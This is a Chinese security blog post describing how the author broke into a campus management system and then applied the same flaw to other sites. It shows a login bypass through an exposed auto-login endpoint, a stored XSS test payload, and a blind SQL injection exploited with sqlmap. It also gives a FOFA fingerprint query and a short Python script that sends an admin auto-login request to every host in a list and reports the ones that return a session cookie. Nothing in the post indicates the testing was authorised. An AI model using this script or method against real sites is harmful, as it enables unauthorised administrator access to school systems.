记一次校园网站漏洞通杀 请设置文章作者 公众号推文 公众号推文 发布于:Oct 8, 2024 次浏览 01 漏洞挖掘Part.01逻辑缺陷 熟悉的页面,熟悉的弱口令测试,但无果我就把目光转向js审计,果不其然有新发现,可以根据账号自动登录于是直接构造请求绕过登录经典的管理员权限 Part.02存储型xss寻找文本输入浅析: 前端:这里的标签都是普通标签,没有像RCDATA元素(RCDATA elements),有和<title>,会做一次HTML编码,所以可以直接插入危险的js代码。 后端:没有任何过滤(笑~</p> <p><img src="/images/edu-vuln-mining-record/5.png" class="lazyload" data-srcset="/images/edu-vuln-mining-record/5.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="images"></p> <p>所以就简单了,直接插入<script>alert('1')</script>即可<br><img src="/images/edu-vuln-mining-record/6.png" class="lazyload" data-srcset="/images/edu-vuln-mining-record/6.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="images"></p> <h2 id="Part-03"><a href="#Part-03" class="headerlink" title="Part.03"></a>Part.03</h2><p><strong>SQL注入</strong><br><img src="/images/edu-vuln-mining-record/7.png" class="lazyload" data-srcset="/images/edu-vuln-mining-record/7.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="images"><br>测试无果<br><img src="/images/edu-vuln-mining-record/8.png" class="lazyload" data-srcset="/images/edu-vuln-mining-record/8.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="images"><br>最后发现注入点在第一个函数,果然任何一个输入点都是不安全的,是布尔型盲注<br><img src="/images/edu-vuln-mining-record/9.png" class="lazyload" data-srcset="/images/edu-vuln-mining-record/9.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="images"><br>后面就是经典Sqlmap了<br><img src="/images/edu-vuln-mining-record/10.png" class="lazyload" data-srcset="/images/edu-vuln-mining-record/10.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="images"></p> <h1 id="02-继续通杀"><a href="#02-继续通杀" class="headerlink" title="02 继续通杀"></a>02 继续通杀</h1><p>根据系统指纹在fofa上搜索:”xx系统” && icon_hash=”11xxxx” 有32个IP,看了下,有重复的<br><img src="/images/edu-vuln-mining-record/11.png" class="lazyload" data-srcset="/images/edu-vuln-mining-record/11.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="images"><br>使用fofa_viewer导出目标 这里我根据第一个逻辑漏洞的漏洞指纹信息,写了一个poc</p> <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">poc</span>(<span class="params">url</span>):</span><br><span class="line"> poc_url = url + <span class="string">'/login/doautologin.edu'</span></span><br><span class="line"> data = {<span class="string">'um.userid'</span>: <span class="string">"admin"</span>}</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> res = requests.post(poc_url, data=data, timeout=<span class="number">5</span>)</span><br><span class="line"> <span class="keyword">if</span> (res.headers.get(<span class="string">"Set-Cookie"</span>)): <span class="comment"># 登录成功就会set-cookie</span></span><br><span class="line"> <span class="built_in">print</span>(url + <span class="string">'/login.html'</span>)</span><br><span class="line"> <span class="keyword">except</span> BaseException: </span><br><span class="line"> <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line"> <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">'url.txt'</span>, <span class="string">'r'</span>) <span class="keyword">as</span> f:</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> f:</span><br><span class="line"> poc(i.rstrip(<span class="string">'\n'</span>))</span><br></pre></td></tr></table></figure> <h1 id="03-思考总结"><a href="#03-思考总结" class="headerlink" title="03 思考总结"></a>03 思考总结</h1><p>**01.**在访问系统当中的时候F12查看源码是一个不错的习惯(尤其是有前端弹框的)</p> <p>**02.**前端代码的一切展示行为完全可控(一定要理解这句话) </p> <p>**03.**了解程序的底层逻辑,你才能更清晰的知道每一个参数的意义</p> </div> <div class='footer'> <!-- 参考资料、相关资料等 --> <!-- 相关文章 --> <!-- 版权声明组件 --> <!-- 打赏组件 --> </div> <div class='article-meta' id="bottom"> <div class='new-meta-box'> <div class="new-meta-item date" itemprop="dateModified" datetime="2025-07-15T20:45:27+08:00"> <a class='notlink'> <i class="fa-solid fa-edit fa-fw" aria-hidden="true"></i> <p>更新于:Jul 15, 2025</p> </a> </div> <div class="new-meta-item meta-tags"><a class="tag" href="/tags/%E5%85%AC%E4%BC%97%E5%8F%B7%E6%8E%A8%E6%96%87/" rel="nofollow"><i class="fa-solid fa-hashtag fa-fw" aria-hidden="true"></i><p>公众号推文</p></a></div> <div class="new-meta-item meta-tags"><a class="tag" href="/tags/Web%E5%AE%89%E5%85%A8/" rel="nofollow"><i class="fa-solid fa-hashtag fa-fw" aria-hidden="true"></i><p>Web安全</p></a></div> <span hidden itemprop="keywords">公众号推文 Web安全</span> <div class="new-meta-item share -mob-share-list"> <div class="-mob-share-list share-body"> <a class="-mob-share-qq" title="" rel="external nofollow noopener noreferrer noopener" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=http://example.com/2024/10/08/edu-vuln-mining-record/&title=记一次校园网站漏洞通杀 - SecureNexusLab&summary=" > <img src="https://unpkg.com/volantis-static@0.0.1654736714924/media/org.volantis/logo/128/qq.png" class="lazyload" data-srcset="https://unpkg.com/volantis-static@0.0.1654736714924/media/org.volantis/logo/128/qq.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="> </a> <a class="-mob-share-qzone" title="" rel="external nofollow noopener noreferrer noopener" target="_blank" href="https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=http://example.com/2024/10/08/edu-vuln-mining-record/&title=记一次校园网站漏洞通杀 - SecureNexusLab&summary=" > <img src="https://unpkg.com/volantis-static@0.0.1654736714924/media/org.volantis/logo/128/qzone.png" class="lazyload" data-srcset="https://unpkg.com/volantis-static@0.0.1654736714924/media/org.volantis/logo/128/qzone.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="> </a> <a class="-mob-share-weibo" title="" rel="external nofollow noopener noreferrer noopener" target="_blank" href="http://service.weibo.com/share/share.php?url=http://example.com/2024/10/08/edu-vuln-mining-record/&title=记一次校园网站漏洞通杀 - SecureNexusLab&summary=" > <img src="https://unpkg.com/volantis-static@0.0.1654736714924/media/org.volantis/logo/128/weibo.png" class="lazyload" data-srcset="https://unpkg.com/volantis-static@0.0.1654736714924/media/org.volantis/logo/128/weibo.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="> </a> </div> </div> </div> <!-- Custom Files bottomMeta begin --> <!-- Custom Files bottomMeta end --> </div> <div class="prev-next"> <a class='prev' href='/2024/10/21/fuzz-testing-2024/'> <p class='title'><i class="fa-solid fa-chevron-left" aria-hidden="true"></i>Fuzz测试之变异模糊测试</p> <p class='content'>SHAPFUZZ: Efficient Fuzzing via Shapley-Guided ByteSelection Abstract 基于变异的模糊测试是一种流行且有效的技术,用于发现...</p> </a> <a class='next' href='/2024/09/27/cve-2019-6445-NTPsec-exploit/'> <p class='title'>怎样才算复现一个CVE?CVE-2019-6445 NTPsec逆向空指针利用<i class="fa-solid fa-chevron-right" aria-hidden="true"></i></p> <p class='content'>怎样才算复现一个CVE?CVE-2019-6445 NTPsec逆向空指针利用 软件介绍NTPsec是一个基于网络时间协议(Network Time Protocol,NTP)的开源时间同步软件...</p> </a> </div> <!-- Custom Files postEnd begin--> <!-- Custom Files postEnd end--> </article> <article class="post white-box shadow floatable blur" id="comments"> <span hidden> <meta itemprop="discussionUrl" content="/2024/10/08/edu-vuln-mining-record/index.html#comments"> </span> <p ct><i class='fa-solid fa-comments'></i> 评论</p> <div id="layoutHelper-comments"></div> </article> </div> <aside id='l_side' itemscope itemtype="http://schema.org/WPSideBar"> <div class="widget-sticky pjax"> </div> <!-- 没有 pjax 占位会报错 万恶的 pjax --> <div class="pjax"> <!-- pjax占位 --> </div> <div class="pjax"> <!-- pjax占位 --> </div> <div class="pjax"> <!-- pjax占位 --> </div> <div class="pjax"> <!-- pjax占位 --> </div> <div class="pjax"> <!-- pjax占位 --> </div> <div class="pjax"> <!-- pjax占位 --> </div> <div class="pjax"> <!-- pjax占位 --> </div> <div class="pjax"> <!-- pjax占位 --> </div> <!-- Custom Files side begin --> <!-- Custom Files side end --> </aside> <!--此文件用来存放一些不方便取值的变量--> <!--思路大概是将值藏到重加载的区域内--> <pjax> <script> window.pdata={} pdata.ispage=true; pdata.commentPath=""; pdata.commentPlaceholder=""; pdata.commentConfig={}; // see: /layout/_partial/scripts/_ctrl/coverCtrl.ejs // header var l_header=document.getElementById("l_header"); l_header.classList.remove("show"); // cover var cover_wrapper=document.querySelector('#l_cover .cover-wrapper'); var scroll_down=document.getElementById('scroll-down'); cover_wrapper.id="half"; cover_wrapper.style.display=""; scroll_down.style.display="none"; </script> </pjax> </div> <footer class="footer clearfix" itemscope itemtype="http://schema.org/WPFooter"> <br><br> <div class="aplayer-container"> </div> <br> <div class="social-wrapper" itemprop="about" itemscope itemtype="http://schema.org/Thing"> </div> <div><p>Blog content follows the <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en">Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0) License</a></p> </div> <div><p><span id="lc-pv">本站总访问量为 <span id='busuanzi_value_site_pv'><i class="fa-solid fa-loader fa-spin fa-fw" aria-hidden="true"></i></span> 次</span> <span id="lc-uv">访客数为 <span id='busuanzi_value_site_uv'><i class="fa-solid fa-loader fa-spin fa-fw" aria-hidden="true"></i></span> 人</span></p> </div> Use <a href="https://github.com/volantis-x/hexo-theme-volantis/#5.8.0" target="_blank" class="codename">Volantis</a> as theme, total visits <span id="busuanzi_value_site_pv"><i class="fa-solid fa-loader fa-spin fa-fw" aria-hidden="true"></i></span> times <div class='copyright'> <p><a href="/">Copyright © since 2024 SecureNexusLab Team</a></p> </div> <!-- Custom Files footer begin--> <!-- Custom Files footer end--> </footer> <a id="s-top" class="fa-solid fa-arrow-up fa-fw" href="/" onclick="return false;" title="top"></a> </div> </div> <div> <script> /******************** volantis.dom ********************************/ // 页面选择器 将dom对象缓存起来 see: /source/js/app.js etc. volantis.dom.bodyAnchor = volantis.dom.$(document.getElementById("safearea")); // 页面主体 volantis.dom.topBtn = volantis.dom.$(document.getElementById('s-top')); // 向上 volantis.dom.wrapper = volantis.dom.$(document.getElementById('wrapper')); // 整个导航栏 volantis.dom.coverAnchor = volantis.dom.$(document.querySelector('#l_cover .cover-wrapper')); // 1个 volantis.dom.switcher = volantis.dom.$(document.querySelector('#l_header .switcher .s-search')); // 搜索按钮 移动端 1个 volantis.dom.header = volantis.dom.$(document.getElementById('l_header')); // 移动端导航栏 volantis.dom.search = volantis.dom.$(document.querySelector('#l_header .m_search')); // 搜索框 桌面端 移动端 1个 volantis.dom.mPhoneList = volantis.dom.$(document.querySelectorAll('#l_header .m-phone .list-v')); // 手机端 子菜单 多个 </script> <script> volantis.css("https://unpkg.com/volantis-static@0.0.1654736714924/libs/@fortawesome/fontawesome-free/css/all.min.css"); </script> <!-- required --> <!-- internal --> <script src="/js/app.js"></script> <!-- rightmenu要在darkmode之前(ToggleButton) darkmode要在comments之前(volantis.dark.push)--> <script> function loadIssuesJS() { const sites_api = document.getElementById('sites-api'); if (sites_api != undefined && typeof SitesJS === 'undefined') { volantis.js("/js/plugins/tags/sites.js") } const friends_api = document.getElementById('friends-api'); if (friends_api != undefined && typeof FriendsJS === 'undefined') { volantis.js("/js/plugins/tags/friends.js") } const contributors_api = document.getElementById('contributors-api'); if (contributors_api != undefined && typeof ContributorsJS === 'undefined') { volantis.js("/js/plugins/tags/contributors.js") } }; loadIssuesJS() volantis.pjax.push(()=>{ loadIssuesJS(); }) </script> <script defer src="https://unpkg.com/volantis-static@0.0.1654736714924/libs/vanilla-lazyload/dist/lazyload.min.js"></script> <script> // https://www.npmjs.com/package/vanilla-lazyload // Set the options globally // to make LazyLoad self-initialize window.lazyLoadOptions = { elements_selector: ".lazyload", threshold: 0 }; // Listen to the initialization event // and get the instance of LazyLoad window.addEventListener( "LazyLoad::Initialized", function (event) { window.lazyLoadInstance = event.detail.instance; }, false ); document.addEventListener('DOMContentLoaded', function () { lazyLoadInstance.update(); }); document.addEventListener('pjax:complete', function () { lazyLoadInstance.update(); }); </script> <script> window.FPConfig = { delay: 0, ignoreKeywords: ["#"], maxRPS: 6, hoverDelay: 0 }; </script> <script defer src="https://unpkg.com/volantis-static@0.0.1654736714924/libs/flying-pages/flying-pages.min.js"></script> <script> volantis.layoutHelper("comments",`<div id="giscus_container"></div>`) volantis.giscus = {}; function check_giscus() { if (volantis.dark.mode === "dark") { volantis.giscus.Theme = 'dark'; } else { volantis.giscus.Theme = 'light'; } return document.getElementById("giscus_container"); } function pjax_giscus() { const HEAD = check_giscus(); if (!HEAD) return; let cfg = Object.assign({"theme":{"light":"light","dark":"dark"}},pdata.commentConfig) const script = document.createElement('script'); script.setAttribute('src', 'https://giscus.app/client.js'); Object.keys(cfg).forEach(k=>{ if (k != "theme") { script.setAttribute('data-'+k, cfg[k]); } }) script.setAttribute('data-theme', volantis.giscus.Theme); script.setAttribute('crossorigin', "anonymous"); HEAD.appendChild(script); } function dark_giscus() { const HEAD = check_giscus(); if (!HEAD) return; const message = { setConfig: { theme: volantis.giscus.Theme } }; const giscusIframe = document.querySelector('iframe.giscus-frame'); giscusIframe.contentWindow.postMessage({ giscus: message }, 'https://giscus.app'); } pjax_giscus(); volantis.pjax.push(pjax_giscus); volantis.dark.push(dark_giscus); </script> <script defer src="https://npm.elemecdn.com/penndu@1.0.0/bsz.js" data-pjax></script> <!-- optional --> <script> const SearchServiceDataPathRoot = ("/" || "/").endsWith("/") ? "/" || "/" : "//" || "/"; const SearchServiceDataPath = SearchServiceDataPathRoot + "content.json"; function loadSearchScript() { // see: layout/_partial/scripts/_ctrl/cdnCtrl.ejs return volantis.js("/js/search/hexo.js"); } function loadSearchService() { loadSearchScript(); document.querySelectorAll(".input.u-search-input").forEach((e) => { e.removeEventListener("focus", loadSearchService, false); }); document.querySelectorAll(".u-search-form").forEach((e) => { e.addEventListener("submit", (event) => { event.preventDefault(); }, false); }); } // 打开并搜索 字符串 s function OpenSearch(s) { if (typeof SearchService === 'undefined') loadSearchScript().then(() => { SearchService.setQueryText(s); SearchService.search(); }); else { SearchService.setQueryText(s); SearchService.search(); } } // 访问含有 ?s=xxx 的链接时打开搜索 // 与搜索引擎 structured data 相关: /scripts/helpers/structured-data/lib/config.js if (window.location.search && /^\?s=/g.test(window.location.search)) { let queryText = decodeURI(window.location.search) .replace(/\ /g, "-") .replace(/^\?s=/g, ""); OpenSearch(queryText); } // 搜索输入框获取焦点时加载搜索 document.querySelectorAll(".input.u-search-input").forEach((e) => { e.addEventListener("focus", loadSearchService, false); }); </script> <script> function pjax_highlightjs_copyCode(){ if (!(document.querySelector(".highlight .code pre") || document.querySelector(".article pre code"))) { return; } VolantisApp.utilCopyCode(".highlight .code pre, .article pre code") } volantis.requestAnimationFrame(pjax_highlightjs_copyCode) volantis.pjax.push(pjax_highlightjs_copyCode) </script> <script> function load_swiper() { if (!document.querySelectorAll(".swiper-container")[0]) return; volantis.css("https://unpkg.com/volantis-static@0.0.1654736714924/libs/swiper/swiper-bundle.min.css"); volantis.js("https://unpkg.com/volantis-static@0.0.1654736714924/libs/swiper/swiper-bundle.min.js").then(() => { pjax_swiper(); }); } load_swiper(); function pjax_swiper() { volantis.swiper = new Swiper('.swiper-container', { slidesPerView: 'auto', spaceBetween: 8, centeredSlides: true, loop: true, pagination: { el: '.swiper-pagination', clickable: true, }, navigation: { nextEl: '.swiper-button-next', prevEl: '.swiper-button-prev', }, }); } volantis.pjax.push(() => { if (!document.querySelectorAll(".swiper-container")[0]) return; if (typeof volantis.swiper === "undefined") { load_swiper(); } else { pjax_swiper(); } }); </script> <!-- pjax 标签必须存在于所有页面 否则 pjax error --> <pjax> </pjax> <script> function listennSidebarTOC() { const navItems = document.querySelectorAll(".toc li"); if (!navItems.length) return; let targets = [] const sections = [...navItems].map((element) => { const link = element.querySelector(".toc-link"); const target = document.getElementById( decodeURI(link.getAttribute("href")).replace("#", "") ); targets.push(target) // 解除 a 标签 href 的 锚点定位, a 标签 href 的 锚点定位 会随机启用?? 产生错位??? link.setAttribute("onclick","return false;") link.setAttribute("toc-action","toc-"+decodeURI(link.getAttribute("href")).replace("#", "")) link.setAttribute("href","/") // 配置 点击 触发新的锚点定位 link.addEventListener("click", (event) => { event.preventDefault(); // 这里的 addTop 是通过错位使得 toc 自动展开. volantis.scroll.to(target,{addTop: 5, observer:true}) // Anchor id history.pushState(null, document.title, "#" + target.id); }); return target; }); function activateNavByIndex(target) { if (target.classList.contains("active-current")) return; document.querySelectorAll(".toc .active").forEach((element) => { element.classList.remove("active", "active-current"); }); target.classList.add("active", "active-current"); let parent = target.parentNode; while (!parent.matches(".toc")) { if (parent.matches("li")) parent.classList.add("active"); parent = parent.parentNode; } } // 方案一: volantis.activateNavIndex=0 activateNavByIndex(navItems[volantis.activateNavIndex]) volantis.scroll.push(()=>{ if (targets[0].getBoundingClientRect().top >= 0) { volantis.activateNavIndex = 0 }else if (targets[targets.length-1].getBoundingClientRect().top < 0) { volantis.activateNavIndex = targets.length-1 } else { for (let index = 0; index < targets.length; index++) { const target0 = targets[index]; const target1 = targets[(index+1)%targets.length]; if (target0.getBoundingClientRect().top < 0&&target1.getBoundingClientRect().top >= 0) { volantis.activateNavIndex=index break; } } } activateNavByIndex(navItems[volantis.activateNavIndex]) }) // 方案二: // IntersectionObserver 不是完美精确到像素级别 也不是低延时性的 // function findIndex(entries) { // let index = 0; // let entry = entries[index]; // if (entry.boundingClientRect.top > 0) { // index = sections.indexOf(entry.target); // return index === 0 ? 0 : index - 1; // } // for (; index < entries.length; index++) { // if (entries[index].boundingClientRect.top <= 0) { // entry = entries[index]; // } else { // return sections.indexOf(entry.target); // } // } // return sections.indexOf(entry.target); // } // function createIntersectionObserver(marginTop) { // marginTop = Math.floor(marginTop + 10000); // let intersectionObserver = new IntersectionObserver( // (entries, observe) => { // let scrollHeight = document.documentElement.scrollHeight; // if (scrollHeight > marginTop) { // observe.disconnect(); // createIntersectionObserver(scrollHeight); // return; // } // let index = findIndex(entries); // activateNavByIndex(navItems[index]); // }, { // rootMargin: marginTop + "px 0px -100% 0px", // threshold: 0, // } // ); // sections.forEach((element) => { // element && intersectionObserver.observe(element); // }); // } // createIntersectionObserver(document.documentElement.scrollHeight); } document.addEventListener("DOMContentLoaded", ()=>{ volantis.requestAnimationFrame(listennSidebarTOC) }); document.addEventListener("pjax:success", ()=>{ volantis.requestAnimationFrame(listennSidebarTOC) }); </script> <script> document.onreadystatechange = function () { if (document.readyState == 'complete') { // 页面加载完毕 样式加载失败,或是当前网速慢,或是开启了省流模式 const { saveData, effectiveType } = navigator.connection || navigator.mozConnection || navigator.webkitConnection || {} if (getComputedStyle(document.querySelector("#safearea"), null)["display"] == "none" || saveData || /2g/.test(effectiveType)) { document.querySelectorAll(".reveal").forEach(function (e) { e.style["opacity"] = "1"; }); document.querySelector("#safearea").style["display"] = "block"; } } } </script> <script type="application/ld+json">[{"@context":"http://schema.org","@type":"Organization","name":"SecureNexusLab","url":"http://example.com/","logo":{"@type":"ImageObject","url":"https://unpkg.com/volantis-static@0.0.1654736714924/media/org.volantis/blog/favicon/android-chrome-192x192.png","width":192,"height":192}},{"@context":"http://schema.org","@type":"Person","name":"SecureNexusLab","image":{"@type":"ImageObject","url":"https://unpkg.com/volantis-static@0.0.1654736714924/media/org.volantis/blog/favicon/android-chrome-192x192.png"},"url":"http://example.com/","sameAs":["https://github.com/volantis-x"],"description":"专注于网络安全与知识分享"},{"@context":"http://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"item":{"@id":"http://example.com/","name":"SecureNexusLab"}},{"@type":"ListItem","position":2,"item":{"@id":"http://example.com/categories/公众号推文/","name":"公众号推文"}},{"@type":"ListItem","position":3,"item":{"@id":"http://example.com/2024/10/08/edu-vuln-mining-record/","name":"记一次校园网站漏洞通杀"}}]},{"@context":"http://schema.org","@type":"WebSite","name":"SecureNexusLab","url":"http://example.com/","keywords":null,"description":"专注于网络安全与知识分享","author":{"@type":"Person","name":"SecureNexusLab","image":{"@type":"ImageObject","url":"https://unpkg.com/volantis-static@0.0.1654736714924/media/org.volantis/blog/favicon/android-chrome-192x192.png"},"url":"http://example.com/","description":"专注于网络安全与知识分享"},"publisher":{"@type":"Organization","name":"SecureNexusLab","url":"http://example.com/","logo":{"@type":"ImageObject","url":"https://unpkg.com/volantis-static@0.0.1654736714924/media/org.volantis/blog/favicon/android-chrome-192x192.png","width":192,"height":192}},"potentialAction":{"@type":"SearchAction","name":"Site Search","target":{"@type":"EntryPoint","urlTemplate":"http://example.com?s={search_term_string}"},"query-input":"required name=search_term_string"}},{"@context":"http://schema.org","@type":"BlogPosting","headline":"记一次校园网站漏洞通杀","description":"专注于网络安全与知识分享","inLanguage":"en","mainEntityOfPage":{"@type":"WebPage","@id":"http://example.com/2024/10/08/edu-vuln-mining-record/"},"author":{"@type":"Person","name":"SecureNexusLab","image":{"@type":"ImageObject","url":"https://unpkg.com/volantis-static@0.0.1654736714924/media/org.volantis/blog/favicon/android-chrome-192x192.png"},"url":"http://example.com/"},"publisher":{"@type":"Organization","name":"SecureNexusLab","logo":{"@type":"ImageObject","url":"https://unpkg.com/volantis-static@0.0.1654736714924/media/org.volantis/blog/favicon/android-chrome-192x192.png","width":192,"height":192}},"url":"http://example.com/2024/10/08/edu-vuln-mining-record/","wordCount":0,"datePublished":"2024-10-08T10:45:00.000Z","dateModified":"2025-07-15T12:45:27.627Z","articleSection":"公众号推文","keywords":"公众号推文,Web安全","image":{"@type":"ImageObject","url":"https://unpkg.com/volantis-static@0.0.1654736714924/media/org.volantis/blog/favicon/android-chrome-192x192.png","width":192,"height":192}}]</script> <!-- pjax重载区域接口: 1. <pjax></pjax> 标签 pjax 标签必须存在于所有页面 否则 pjax error 2. script[data-pjax] 3. .pjax-reload script 4. .pjax --> <script src="https://unpkg.com/volantis-static@0.0.1654736714924/libs/pjax/pjax.min.js"></script> <script> var pjax; document.addEventListener('DOMContentLoaded', function () { pjax = new Pjax({ elements: 'a[href]:not([href^="#"]):not([href="javascript:void(0)"]):not([pjax-fancybox]):not([onclick="return false;"]):not([onclick="return!1"]):not([target="_blank"]):not([target="view_window"]):not([href$=".xml"])', selectors: [ "head title", "head meta[name=keywords]", "head meta[name=description]", "#l_main", "#pjax-header-nav-list", ".pjax", "pjax", // <pjax></pjax> 标签 "script[data-pjax], .pjax-reload script" // script标签添加data-pjax 或 script标签外层添加.pjax-reload 的script代码段重载 ], cacheBust: false, // url 地址追加时间戳,用以避免浏览器缓存 timeout: 5000, }); }); document.addEventListener('pjax:send', function (e) { //window.stop(); // 相当于点击了浏览器的停止按钮 try { var currentUrl = window.location.pathname; var targetUrl = e.triggerElement.href; var banUrl = [""]; if (banUrl[0] != "") { banUrl.forEach(item => { if(currentUrl.indexOf(item) != -1 || targetUrl.indexOf(item) != -1) { window.location.href = targetUrl; } }); } } catch (error) {} // 使用 volantis.pjax.send 方法传入pjax:send回调函数 参见layout/_partial/scripts/global.ejs volantis.pjax.method.send.start(); }); document.addEventListener('pjax:complete', function () { // 使用 volantis.pjax.push 方法传入重载函数 参见layout/_partial/scripts/global.ejs volantis.pjax.method.complete.start(); }); document.addEventListener('pjax:error', function (e) { if(volantis.debug) { console.error(e); console.log('pjax error: \n' + JSON.stringify(e)); }else{ // 使用 volantis.pjax.error 方法传入pjax:error回调函数 参见layout/_partial/scripts/global.ejs volantis.pjax.method.error.start(); window.location.href = e.triggerElement.href; } }); </script> </div> <!-- import body_end begin--> <!-- import body_end end--> <!-- Custom Files bodyEnd begin--> <!-- Custom Files bodyEnd end--> <!-- front-matter body_end begin --> <!-- front-matter body_end end --> </body> </html>
